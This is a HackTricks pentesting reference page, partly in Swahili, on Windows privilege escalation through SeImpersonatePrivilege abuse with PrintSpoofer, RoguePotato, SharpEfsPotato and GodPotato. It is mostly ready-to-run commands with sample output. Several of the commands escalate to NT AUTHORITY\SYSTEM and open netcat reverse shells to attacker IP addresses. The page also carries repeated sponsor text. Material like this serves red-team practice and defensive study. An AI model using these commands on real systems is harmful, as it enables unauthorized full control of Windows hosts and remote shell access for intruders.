RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

WhiteIntel

WhiteIntel ni injini ya utafutaji inayotumiwa na dark-web ambayo inatoa kazi za bure kuangalia kama kampuni au wateja wake wamekuwa kimeathiriwa na stealer malwares.

Lengo lao kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulizi ya ransomware yanayotokana na malware inayopora taarifa.

Unaweza kuangalia tovuti yao na kujaribu injini yao kwa bure kwenye:

WhiteIntel

JuicyPotato haitumiki kwenye Windows Server 2019 na Windows 10 build 1809 kuendelea. Hata hivyo, PrintSpoofer, RoguePotato, SharpEfsPotato, GodPotato zinaweza kutumika ili kuongeza haki sawa na kupata ufikiaji wa kiwango cha NT AUTHORITY\SYSTEM. Hii blog post inaelezea kwa undani kuhusu zana ya PrintSpoofer, ambayo inaweza kutumika kuboresha haki za uigaji kwenye Windows 10 na Server 2019 ambapo JuicyPotato haitumiki tena.

Quick Demo

PrintSpoofer

c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening...

[+] CreateProcessAsUser() OK

NULL

RoguePotato

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

SharpEfsPotato

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system

GodPotato

GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

References

WhiteIntel

WhiteIntel ni injini ya kutafuta inayotumiwa na dark-web ambayo inatoa kazi za bure kuangalia kama kampuni au wateja wake wamekuwa compromised na stealer malwares.

Lengo lao kuu la WhiteIntel ni kupambana na kuchukuliwa kwa akaunti na mashambulizi ya ransomware yanayotokana na malware ya kuiba taarifa.

Unaweza kuangalia tovuti yao na kujaribu injini yao kwa bure kwenye:

WhiteIntel

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousPrivilege Escalation with Autoruns NextSeDebug + SeImpersonate copy token

Last updated 7 days ago